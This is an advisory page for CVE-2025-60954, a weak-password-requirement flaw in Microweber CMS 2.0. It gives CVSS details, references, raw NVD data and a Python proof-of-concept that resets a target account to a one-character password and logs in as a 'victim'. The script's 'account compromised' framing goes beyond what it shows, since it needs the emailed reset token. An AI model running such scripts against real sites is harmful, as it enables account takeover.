CVE-2025-60954

Description

Microweber CMS 2.0 has Weak Password Requirements. The application does not enforce minimum password length or complexity during password resets. Users can set extremely weak passwords, including single-character passwords, which can lead to account compromise, including administrative accounts.

CVSS Details

CVSS Score

8.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:microweber:microweber:2.0.0:*:*:*:*:*:*:* - VULNERABLE

Microweber CMS 2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3 """ CVE-2025-60954 PoC - Microweber CMS 2.0 Weak Password Requirements This PoC demonstrates the weak password validation vulnerability in Microweber CMS 2.0 """ import requests import json import sys TARGET_URL = "http://target-site.com" VICTIM_EMAIL = "[email protected]" def request_password_reset(url, email): """Step 1: Request password reset for target account""" reset_endpoint = f"{url}/api/user/password_reset" data = {"email": email} try: response = requests.post(reset_endpoint, json=data, timeout=10) return response.json() if response.ok else None except requests.RequestException as e: print(f"[-] Error requesting password reset: {e}") return None def reset_password_with_weak_pwd(url, reset_token, weak_password="a"): """Step 2: Reset password with weak password (e.g., single character)""" reset_endpoint = f"{url}/api/user/password_reset/confirm" data = { "token": reset_token, "password": weak_password, "password_confirmation": weak_password } try: response = requests.post(reset_endpoint, json=data, timeout=10) if response.ok: print(f"[+] Password successfully reset to: '{weak_password}'") print(f"[!] This demonstrates the weak password validation vulnerability") return True else: print(f"[-] Password reset failed: {response.status_code}") return False except requests.RequestException as e: print(f"[-] Error resetting password: {e}") return False def verify_weak_password_login(url, email, weak_password): """Step 3: Verify login with weak password works""" login_endpoint = f"{url}/api/user/login" data = { "email": email, "password": weak_password } try: response = requests.post(login_endpoint, json=data, timeout=10) if response.ok and "token" in response.json(): print(f"[+] Login successful with weak password: '{weak_password}'") print(f"[!] Account compromised!") return True return False except requests.RequestException as e: print(f"[-] Error during login verification: {e}") return False def main(): print("=" * 60) print("CVE-2025-60954 PoC - Microweber CMS 2.0") print("Weak Password Requirements Vulnerability") print("=" * 60) if len(sys.argv) > 1: url = sys.argv[1] else: url = TARGET_URL print(f"\n[*] Target: {url}") print(f"[*] Victim email: {VICTIM_EMAIL}") print("\n[*] Step 1: Requesting password reset...") reset_result = request_password_reset(url, VICTIM_EMAIL) if reset_result: print("[+] Password reset email sent") reset_token = input("\n[?] Enter password reset token (from email): ") weak_password = input("[?] Enter weak password to use (default: 'a'): ") or "a" print("\n[*] Step 2: Resetting password with weak password...") if reset_password_with_weak_pwd(url, reset_token, weak_password): print("\n[*] Step 3: Verifying login with weak password...") verify_weak_password_login(url, VICTIM_EMAIL, weak_password) if __name__ == "__main__": main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-60954
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-60954
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-60954/
[4] VulDB https://vuldb.com/cve/CVE-2025-60954
[5] https://gist.github.com/progprnv/feae2b76f2db0cb2ac6e14b1bf7d8646
[6] https://github.com/microweber/microweber
[7] https://github.com/progprnv/CVE-Reports/blob/main/CVE-2025-60954

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-60954", "sourceIdentifier": "[email protected]", "published": "2025-10-24T21:16:03.917", "lastModified": "2025-10-28T14:22:52.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microweber CMS 2.0 has Weak Password Requirements. The application does not enforce minimum password length or complexity during password resets. Users can set extremely weak passwords, including single-character passwords, which can lead to account compromise, including administrative accounts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-521"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microweber:microweber:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D1F2EB73-6775-4681-BFED-D7D759214A11"}]}]}], "references": [{"url": "https://gist.github.com/progprnv/feae2b76f2db0cb2ac6e14b1bf7d8646", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/microweber/microweber", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/progprnv/CVE-Reports/blob/main/CVE-2025-60954", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}